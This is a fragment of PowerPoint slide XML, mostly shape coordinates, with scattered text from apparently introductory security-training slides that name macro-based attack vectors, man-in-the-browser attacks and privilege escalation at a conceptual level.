                  <a:pt x="176297" y="1181100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209380" y="1143000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245300" y="1117600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284056" y="1079500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325649" y="1054100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370077" y="1041400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417032" y="1016000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466146" y="1003300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570512" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997539" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950290" y="952500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="900783" y="939800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849136" y="927100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="682498" y="1320800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="633606" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589121" y="1346200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549731" y="1358900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516127" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487402" y="1422400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467296" y="1460500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455477" y="1511300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451612" y="1549400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451612" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501221" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502412" y="1612900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502412" y="1549400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505086" y="1511300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513524" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528343" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550164" y="1422400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577449" y="1409700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608615" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643639" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682498" y="1371600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="831316" y="1371600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="813764" y="1358900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774541" y="1346200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="730888" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682498" y="1320800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="739877" y="914400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="630756" y="914400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580298" y="927100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795462" y="927100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739877" y="914400"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="2381804" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2290271" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2157024" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2115312" y="63500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045718" y="673100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1037486" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033018" y="698500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032359" y="698500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035558" y="711200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041840" y="723900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069594" y="723900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142490" y="101600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2145792" y="101600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2187452" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2274946" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535907" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2515051" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381804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13176" y="3857666"/>
            <a:ext cx="4244340" cy="3945254"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="913501" y="1001100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="842010" y="1001100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845947" y="1004783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849629" y="1004783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849629" y="3158449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2152396" y="3883492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2198555" y="3905273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2246380" y="3922500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2295673" y="3935009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2346240" y="3942635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2397887" y="3945214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2449904" y="3942635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2501360" y="3935009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2551725" y="3922500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600469" y="3905273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627038" y="3892852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2376444" y="3892852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2326343" y="3887217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276986" y="3875947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2228870" y="3859042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2182495" y="3836502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="913891" y="3136605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="913891" y="1004783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="913501" y="1001100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="2628082" y="52734"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2426789" y="52734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2476881" y="58379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526219" y="69667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574307" y="86601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2620645" y="109179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3972432" y="859749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4015735" y="886386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054883" y="917615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089625" y="952929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4119730" y="991852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4144889" y="1033784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4164908" y="1078311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179518" y="1124895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4188468" y="1173029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4191507" y="1222207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4191507" y="2723347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4188468" y="2772441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179518" y="2820301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4164908" y="2866513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4144889" y="2910662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4119711" y="2952332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089625" y="2991110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054883" y="3026578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4015735" y="3058324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3972432" y="3085932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2620645" y="3836502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574307" y="3859042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526219" y="3875947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2476880" y="3887217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2426789" y="3892852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627038" y="3892852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998976" y="3132922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042539" y="3105707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4082479" y="3074330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4118566" y="3039205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4150577" y="3000748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178284" y="2959376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4201460" y="2915505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219880" y="2869550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4233318" y="2821928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4241546" y="2773055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4244340" y="2723347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4244340" y="1222207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4241546" y="1172467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4233318" y="1123575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219880" y="1075944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4201460" y="1029985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178284" y="986114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4150577" y="944741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4118566" y="906281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4082479" y="871146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042539" y="839750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998976" y="812505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647061" y="62062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2628082" y="52734"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="411607" y="1443568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="358775" y="1443568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358775" y="2948010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360759" y="2958160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366267" y="2966250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374634" y="2971602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385190" y="2973537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395694" y="2971602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404066" y="2966250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409604" y="2958160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411607" y="2948010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411607" y="1443568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="849629" y="943061"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="411607" y="943061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397468" y="943749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354838" y="953983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45338" y="1084539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11334" y="1110304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1149690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7493" y="1450680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12630" y="1478125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25923" y="1496034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44194" y="1505776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64262" y="1508719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71754" y="1508719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311218" y="1454363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60325" y="1454363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60325" y="1450680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52832" y="1149690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52832" y="1142578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369950" y="1008339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403987" y="1001100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="913501" y="1001100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912512" y="991821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885723" y="953830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="863105" y="944364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849629" y="943061"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="366133" y="1387684"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="354838" y="1388958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64262" y="1454363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311218" y="1454363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358775" y="1443568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411607" y="1443568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411607" y="1428963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410817" y="1422902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="377094" y="1389053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366133" y="1387684"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4244340" h="3945254">
                <a:moveTo>
                  <a:pt x="2424746" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2378425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332278" y="4137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286642" y="12412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241859" y="24824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2198267" y="41374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156206" y="62062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962787" y="678520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948017" y="703898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951611" y="714715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958540" y="723545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967613" y="728304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978114" y="728966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989329" y="725510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2182495" y="109179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2228870" y="86601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276986" y="69667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2326343" y="58379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2376444" y="52734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2628082" y="52734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604968" y="41374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561350" y="24824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2516548" y="12412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2470900" y="4137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2424746" y="0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621148" y="5125287"/>
            <a:ext cx="2454910" cy="1368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90"/>
              </a:spcBef>
            </a:pP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Vi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ual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Basic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for  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Appl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cati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ns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(VBA): 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Microsoft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Office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document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macr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77347" y="5295138"/>
            <a:ext cx="1934845" cy="10325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90"/>
              </a:spcBef>
            </a:pP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Ja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v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ascript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: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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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F 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document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macros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14491" y="306451"/>
            <a:ext cx="482727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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-10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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack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26508" y="760476"/>
            <a:ext cx="6588252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725671" y="1756298"/>
            <a:ext cx="9209405" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="188595" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1485"/>
              </a:spcBef>
            </a:pP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Man-in-the-Browser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(MitB)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attack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specific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type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on-path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attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2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dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Based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level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privilege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gained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over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browser,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attacker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can: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331707" y="3697223"/>
            <a:ext cx="4520565" cy="3199130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4520565" h="3199129">
                <a:moveTo>
                  <a:pt x="4234688" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="285496" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239203" y="3738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195283" y="14561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154324" y="31879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116915" y="55103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83645" y="83645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55103" y="116915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31879" y="154324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14561" y="195283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3738" y="239203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="285496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2913380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3738" y="2959672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14561" y="3003592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31879" y="3044551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55103" y="3081960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83645" y="3115230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116915" y="3143772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154324" y="3166996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195283" y="3184314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239203" y="3195137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285496" y="3198876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4234688" y="3198876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4280980" y="3195137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4324900" y="3184314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4365859" y="3166996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4403268" y="3143772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4436538" y="3115230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465080" y="3081960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488304" y="3044551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4505622" y="3003592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4516445" y="2959672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4520184" y="2913380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4520184" y="285496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4516445" y="239203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4505622" y="195283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488304" y="154324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465080" y="116915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4436538" y="83645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4403268" y="55103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4365859" y="31879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4324900" y="14561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4280980" y="3738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4234688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494268" y="4480077"/>
            <a:ext cx="3587750" cy="1555750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7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Inspect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session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data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37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Change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browser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settings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37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Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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redirection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37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Perform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code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injection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82211" y="3697223"/>
            <a:ext cx="3483864" cy="34838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82003" y="306451"/>
            <a:ext cx="34905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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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8047" y="760476"/>
            <a:ext cx="4824984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834378" y="1933193"/>
            <a:ext cx="258826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Privileg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escalati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n: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15995" y="2636520"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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858259" y="3018789"/>
            <a:ext cx="880745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Gets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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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from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target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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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run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arbitrary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code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15995" y="4014215"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
